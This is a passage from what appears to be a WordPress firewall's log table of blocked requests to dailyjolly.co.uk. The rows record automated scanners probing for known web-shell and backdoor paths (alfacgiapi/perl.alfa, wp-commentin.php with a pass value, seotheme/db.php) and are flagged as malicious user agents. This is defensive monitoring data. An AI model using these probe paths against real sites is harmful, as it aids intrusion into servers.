User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11757,1674337440.110075,1674337439.981700,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11758,1674337439.755066,1674337439.428300,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11759,1674337439.201602,1674337439.018100,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11760,1674337438.565491,1674337438.409400,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(11761,1674337435.330421,1674337435.201300,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11762,1674337434.514977,1674337434.368000,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11763,1674336785.337927,1674336785.211800,'\0\0\0\0\0\0\0\0\0\0���\\�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11764,1674336769.536616,1674336769.381000,'\0\0\0\0\0\0\0\0\0\0���\\�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11765,1674336517.222537,1674336516.931600,'\0\0\0\0\0\0\0\0\0\0��A�\\�',0,403,0,0,0,'https://dailyjolly.co.uk/101/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzEwMS9saWNlbnNlLnR4dA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11766,1674328935.501924,1674328935.338700,'\0\0\0\0\0\0\0\0\0\0��h�+\n',0,403,0,0,0,'https://www.dailyjolly.co.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11767,1674328935.260714,1674328935.148500,'\0\0\0\0\0\0\0\0\0\0��h�+\n',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11768,1674328935.079329,1674328934.913700,'\0\0\0\0\0\0\0\0\0\0��h�+\n',0,403,0,0,0,'https://www.dailyjolly.co.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11769,1674328934.839824,1674328934.678100,'\0\0\0\0\0\0\0\0\0\0��h�+\n',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11770,1674328934.684033,1674328934.529800,'\0\0\0\0\0\0\0\0\0\0��h�+\n',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11771,1674328934.531128,1674328934.372600,'\0\0\0\0\0\0\0\0\0\0��h�+\n',0,403,0,0,0,'https://www.dailyjolly.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(11772,1674328934.363652,1674328934.209300,'\0\0\0\0\0\0\0\0\0\0��h�+\n',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11773,1674328920.048541,1674328919.910000,'\0\0\0\0\0\0\0\0\0\0��h�+\n',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11774,1674328919.685671,1674328919.515800,'\0\0\0\0\0\0\0\0\0\0��h�+\n',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11775,1674325484.426140,1674325484.296900,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11776,1674325474.687864,1674325474.562100,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11777,1674322528.338391,1674322528.180500,'\0\0\0\0\0\0\0\0\0\0���w��',0,403,0,0,0,'https://dailyjolly.co.uk/1000/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzEwMDAvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11778,1674320893.317490,1674320892.757500,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11779,1674320883.181853,1674320882.264700,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11780,1674320854.896342,1674320854.326400,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11781,1674320838.904862,1674320838.210400,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11782,1674320808.990668,1674320807.536200,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11783,1674343990.924082,1674343990.786700,'\0\0\0\0\0\0\0\0\0\0���}O',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 